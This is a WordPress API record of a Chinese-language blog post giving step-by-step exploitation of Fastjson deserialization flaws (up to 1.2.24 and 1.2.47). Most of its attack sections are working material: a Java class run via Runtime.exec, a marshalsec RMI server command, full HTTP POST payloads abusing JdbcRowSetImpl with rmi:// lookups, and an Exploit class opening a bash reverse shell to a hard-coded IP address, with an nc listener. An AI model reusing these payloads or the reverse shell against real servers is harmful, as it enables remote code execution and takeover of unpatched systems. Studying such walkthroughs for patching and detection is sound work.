{"id":687,"date":"2022-02-21T14:07:44","date_gmt":"2022-02-21T14:07:44","guid":{"rendered":"http:\/\/www.nokws.top\/?p=687"},"modified":"2022-02-21T14:09:26","modified_gmt":"2022-02-21T14:09:26","slug":"fastjson","status":"publish","type":"post","link":"http:\/\/www.nokws.top\/index.php\/2022\/02\/21\/fastjson\/","title":{"rendered":"Fastjson"},"content":{"rendered":"\n

fastjson\u7528\u4e8e\u5c06Java Bean\u5e8f\u5217\u5316\u4e3aJSON\u5b57\u7b26\u4e32\uff0c\u4e5f\u53ef\u4ee5\u4eceJSON\u5b57\u7b26\u4e32\u53cd\u5e8f\u5217\u5316\u5230JavaBean\u3002fastjson.jar\u662f\u963f\u91cc\u5f00\u53d1\u7684\u4e00\u6b3e\u4e13\u95e8\u7528\u4e8eJava\u5f00\u53d1\u7684\u5305\uff0c\u53ef\u4ee5\u65b9\u4fbf\u7684\u5b9e\u73b0json\u5bf9\u8c61\u4e0eJavaBean\u5bf9\u8c61\u7684\u8f6c\u6362\uff0c\u5b9e\u73b0JavaBean\u5bf9\u8c61\u4e0ejson\u5b57\u7b26\u4e32\u7684\u8f6c\u6362\uff0c\u5b9e\u73b0json\u5bf9\u8c61\u4e0ejson\u5b57\u7b26\u4e32\u7684\u8f6c\u6362\u3002\u9664\u4e86\u8fd9\u4e2afastjson\u4ee5\u5916\uff0c\u8fd8\u6709Google\u5f00\u53d1\u7684Gson\u5305\uff0c\u5176\u4ed6\u5f62\u5f0f\u7684\u5982net.sf.json\u5305\uff0c\u90fd\u53ef\u4ee5\u5b9e\u73b0json\u7684\u8f6c\u6362\u3002\u65b9\u6cd5\u540d\u79f0\u4e0d\u540c\u800c\u5df2\uff0c\u6700\u540e\u7684\u5b9e\u73b0\u7ed3\u679c\u90fd\u662f\u4e00\u6837\u7684\u3002<\/p>\n\n\n\n

JNDI<\/h3>\n\n\n\n

JNDI\u662f Java \u547d\u540d\u4e0e\u76ee\u5f55\u63a5\u53e3\uff08Java Naming and Directory Interface\uff09\uff0c\u5728J2EE\u89c4\u8303\u4e2d\u662f\u91cd\u8981\u7684\u89c4\u8303\u4e4b\u4e00\u3002JNDI\u63d0\u4f9b\u7edf\u4e00\u7684\u5ba2\u6237\u7aefAPI\uff0c\u4e3a\u5f00\u53d1\u4eba\u5458\u63d0\u4f9b\u4e86\u67e5\u627e\u548c\u8bbf\u95ee\u5404\u79cd\u547d\u540d\u548c\u76ee\u5f55\u670d\u52a1\u7684\u901a\u7528\u3001\u7edf\u4e00\u7684\u63a5\u53e3\uff0c\u53ef\u4ee5\u7528\u6765\u5b9a\u4f4d\u7528\u6237\u3001\u7f51\u7edc\u3001\u673a\u5668\u3001\u5bf9\u8c61\u548c\u670d\u52a1\u7b49\u5404\u79cd\u8d44\u6e90\u3002\u6bd4\u5982\u53ef\u4ee5\u5229\u7528JNDI\u518d\u5c40\u57df\u7f51\u4e0a\u5b9a\u4f4d\u4e00\u53f0\u6253\u5370\u673a\uff0c\u4e5f\u53ef\u4ee5\u7528JNDI\u6765\u5b9a\u4f4d\u6570\u636e\u5e93\u670d\u52a1\u6216\u4e00\u4e2a\u8fdc\u7a0bJava\u5bf9\u8c61\u3002JNDI\u5e95\u5c42\u652f\u6301RMI\u8fdc\u7a0b\u5bf9\u8c61\uff0cRMI\u6ce8\u518c\u7684\u670d\u52a1\u53ef\u4ee5\u901a\u8fc7JNDI\u63a5\u53e3\u6765\u8bbf\u95ee\u548c\u8c03\u7528\u3002<\/p>\n\n\n\n

JNDi\u662f\u5e94\u7528\u7a0b\u5e8f\u8bbe\u8ba1\u7684Api\uff0cJNDI\u53ef\u4ee5\u6839\u636e\u540d\u5b57\u52a8\u6001\u52a0\u8f7d\u6570\u636e\uff0c\u652f\u6301\u7684\u670d\u52a1\u4e3b\u8981\u6709\u4ee5\u4e0b\u51e0\u79cd\uff1a<\/p>\n\n\n\n

DNS\u3001LDAP\u3001CORBA\u5bf9\u8c61\u670d\u52a1\u3001RMI<\/strong><\/p>\n\n\n\n

<\/p>\n\n\n\n

Fastjson<1.2.24\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff08CNVD-2017-02833 \uff09<\/h2>\n\n\n\n

\u6f0f\u6d1e\u539f\u7406<\/p>\n\n\n\n

fastjson\u5728\u89e3\u6790json\u7684\u8fc7\u7a0b\u4e2d\uff0c\u652f\u6301\u4f7f\u7528autoType\u6765\u5b9e\u4f8b\u5316\u67d0\u4e00\u4e2a\u5177\u4f53\u7684\u7c7b\uff0c\u5e76\u8c03\u7528\u8be5\u7c7b\u7684set\/get\u65b9\u6cd5\u6765\u8bbf\u95ee\u5c5e\u6027\u3002\u901a\u8fc7\u67e5\u627e\u4ee3\u7801\u4e2d\u76f8\u5173\u7684\u65b9\u6cd5\uff0c\u5373\u53ef\u6784\u9020\u51fa\u4e00\u4e9b\u6076\u610f\u5229\u7528\u94fe\u3002<\/p>\n\n\n\n

\u6f0f\u6d1e\u5206\u6790<\/p>\n\n\n\n

fastjson \u8fdc\u7a0b\u53cd\u5e8f\u5217\u5316poc\u7684\u6784\u9020\u548c\u5206\u6790<\/a><\/p>\n\n\n\n

\u5229\u7528\u8fc7\u7a0b<\/p>\n\n\n\n

1\u3001\u786e\u5b9a\u76ee\u6807\u7ad9\u70b9\u4f7f\u7528fastjson\u7248\u672c<=1.2.24<\/p>\n\n\n\n

2\u3001\u521b\u5efaTouchFile.java\u6587\u4ef6\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n\n\n\n

\/\/ javac TouchFile.java\nimport java.lang.Runtime;\nimport java.lang.Process;\n \npublic class TouchFile {\n    static {\n        try {\n            Runtime rt = Runtime.getRuntime();\n            String[] commands = {\"touch\", \"\/tmp\/success\"};\n            Process pc = rt.exec(commands);\n            pc.waitFor();\n        } catch (Exception e) {\n            \/\/ do nothing\n        }\n    }\n}\r<\/code><\/pre>\n\n\n\n
3\u3001\u6267\u884c\u7f16\u8bd1\u547d\u4ee4javac TouchFile.java\uff0c\u5f97\u5230TouchFile.class\u6587\u4ef6\u3002\u5728\u6587\u4ef6\u76ee\u5f55\u4e0b\uff0c\u901a\u8fc7python3 -m http.server port\u547d\u4ee4\u5f00\u8bbe\u670d\u52a1\u5668\u3002\uff08\u901a\u8fc7\u6d4f\u89c8\u5668\u8bbf\u95ee\uff0c\u8fdb\u884c\u9a8c\u8bc1\uff09<\/p>\n\n\n\n
4\u3001\u501f\u52a9marshalsec<\/a>\u9879\u76ee\uff0c\u542f\u52a8\u4e00\u4e2aRMI\u670d\u52a1\u5668\uff0c\u76d1\u542c9999\u7aef\u53e3\uff0c\u5e76\u5236\u5b9a\u52a0\u8f7d\u8fdc\u7a0b\u7c7bTouchFile.class<\/code>\uff1a<\/p>\n\n\n\n
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer \"http:\/\/xx.xx.xx.xx:8000\/#TouchFile\" 9999<\/code><\/pre>\n\n\n\n
5\u3001\u5728\u6f0f\u6d1e\u9875\u9762bp\u6293\u5305\u540epost\u63d0\u4ea4\u6570\u636e\uff0c\u66ff\u6362\u5982\u4e0bpayload\uff1a<\/p>\n\n\n\n
POST \/ HTTP\/1.1\r\nHost: \u9776\u673aip:\u7aef\u53e3\r\nAccept: *\/*\r\nAccept-Language: zh-CN\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE)\r\nConnection: close\r\nContent-Length: 165\r\nContent-Type: application\/json\r\nAccept-Encoding: gzip, deflate\r\n \r\n{\r\n    \"b\":{\r\n        \"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\r\n        \"dataSourceName\":\"rmi:\/\/xx.xx.xx.xx:9999\/TouchFile\",\r\n        \"autoCommit\":true\r\n    }\r\n}<\/code><\/pre>\n\n\n\n
\u5229\u7528\u5b8c\u6210<\/p>\n\n\n\n
Fastjson<1.2.48\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CNVD-2019-22238\uff09<\/h2>\n\n\n\n
\u6f0f\u6d1e\u539f\u7406<\/p>\n\n\n\n
fastjson\u4e8e1.2.24\u7248\u672c\u540e\u589e\u52a0\u4e86\u53cd\u5e8f\u5217\u5316\u767d\u540d\u5355\uff0c\u800c\u57281.2.48\u4ee5\u524d\u7684\u7248\u672c\u4e2d\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u7279\u6b8a\u6784\u9020\u7684json\u5b57\u7b26\u4e32\u7ed5\u8fc7\u767d\u540d\u5355\u68c0\u6d4b\uff0c\u6210\u529f\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n\n\n\n
\u6f0f\u6d1e\u5206\u6790<\/p>\n\n\n\n
Fastjson <=1.2.47 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u5206\u6790<\/a><\/p>\n\n\n\n
\u5229\u7528\u8fc7\u7a0b<\/p>\n\n\n\n
1\u3001\u786e\u5b9a\u76ee\u6807\u7ad9\u70b9\u4f7f\u7528fastjson\u7248\u672c<=1.2.47<\/p>\n\n\n\n
2\u3001\u7f16\u5199\u4e00\u4e2a\u53cd\u5f39shell\u811a\u672cExploit.java\uff0c\u5e76\u7f16\u8bd1\u751f\u6210Exploit.class\u3002<\/p>\n\n\n\n
public class Exploit {\r\n    public Exploit(){\r\n        try{\r\n            Runtime.getRuntime().exec(\"\/bin\/bash -c $@|bash 0 echo bash -i >&\/dev\/tcp\/98.126.219.155\/58274 0>&1\");\r\n        }catch(Exception e){\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n    public static void main(String[] argv){\r\n        Exploit e = new Exploit();\r\n    }\r\n}<\/code><\/pre>\n\n\n\n
3\u30014\u540cFastjson<1.2.24\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff08CNVD-2017-02833 \uff09<\/p>\n\n\n\n
5\u3001\u5f00\u542fnc\u76d1\u542c\u7aef\u53e34444\uff1anc -lvvp 4444\uff08\u53cd\u5f39shell\uff09<\/strong><\/p>\n\n\n\n
6\u3001\u5728\u6f0f\u6d1e\u9875\u9762bp\u6293\u5305\u540epost\u63d0\u4ea4\u6570\u636e\uff0c\u66ff\u6362\u5982\u4e0bpayload\uff1a<\/p>\n\n\n\n
POST \/ HTTP\/1.1\r\nHost: xx.xx.xx.xx:8090\r\nAccept: *\/*\r\nAccept-Language: zh-CN\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE)\r\nConnection: close\r\nContent-Length: 165\r\nContent-Type: application\/json\r\nAccept-Encoding: gzip, deflate\r\n \r\n{\r\n    \"a\":{\r\n        \"@type\":\"java.lang.Class\",\r\n        \"val\":\"com.sun.rowset.JdbcRowSetImpl\"\r\n    },\r\n    \"b\":{\r\n        \"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\r\n        \"dataSourceName\":\"rmi:\/\/xx.xx.xx.xx:9999\/Exploit\",\r\n        \"autoCommit\":true\r\n    }\r\n}<\/code><\/pre>\n\n\n\n
Fstjson < 1.2.60 \u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e<\/h2>\n\n\n\n
fastjson\u4f4e\u4e8e1.2.60\u7684\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e<\/a><\/p>\n\n\n\n
FastJson\u6e17\u900f\u603b\u7ed3<\/h2>\n\n\n\n
1\u3001\u53cd\u5e8f\u5217\u5316\u5e38\u7528\u7684\u4e24\u79cd\u5229\u7528\u65b9\u5f0f\uff0c\u4e00\u79cd\u662f\u57fa\u4e8ermi\uff0c\u4e00\u79cd\u662f\u57fa\u4e8eldap\u3002<\/p>\n\n\n\n
2\u3001RMI\u662f\u4e00\u79cd\u884c\u4e3a\uff0c\u6307\u7684\u662fJava\u8fdc\u7a0b\u65b9\u6cd5\u8c03\u7528\u3002<\/p>\n\n\n\n
3\u3001JNDI\u662f\u4e00\u4e2a\u63a5\u53e3\uff0c\u5728\u8fd9\u4e2a\u63a5\u53e3\u4e0b\u4f1a\u6709\u591a\u79cd\u76ee\u5f55\u7cfb\u7edf\u670d\u52a1\u7684\u5b9e\u73b0\uff0c\u901a\u8fc7\u540d\u79f0\u7b49\u53bb\u627e\u5230\u76f8\u5173\u7684\u5bf9\u8c61\uff0c\u5e76\u628a\u5b83\u4e0b\u8f7d\u5230\u5ba2\u6237\u7aef\u4e2d\u6765\u3002<\/p>\n\n\n\n
4\u3001ldap\u6307\u8f7b\u91cf\u7ea7\u76ee\u5f55\u670d\u52a1\u534f\u8bae\u3002<\/code><\/p>\n\n\n\n
\u53c2\u8003\u94fe\u63a5<\/h2>\n\n\n\n
Fastjson\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u603b\u7ed3<\/a><\/p>\n\n\n\n
Fastjson\u7cfb\u5217\u6f0f\u6d1e\u5b9e\u6218\u548c\u603b\u7ed3<\/a><\/p>\n\n\n\n
Fastjson <=1.2.62 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c-\u6f0f\u6d1e\u590d\u73b0 <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
fastjson\u7528\u4e8e\u5c06Java Bean\u5e8f\u5217\u5316\u4e3aJSON\u5b57\u7b26\u4e32\uff0c\u4e5f\u53ef\u4ee5\u4eceJSON\u5b57\u7b26\u4e32\u53cd\u5e8f\u5217\u5316\u5230JavaBea […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-687","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/687","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/comments?post=687"}],"version-history":[{"count":2,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/687\/revisions"}],"predecessor-version":[{"id":690,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/687\/revisions\/690"}],"wp:attachment":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/media?parent=687"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/categories?post=687"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/tags?post=687"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}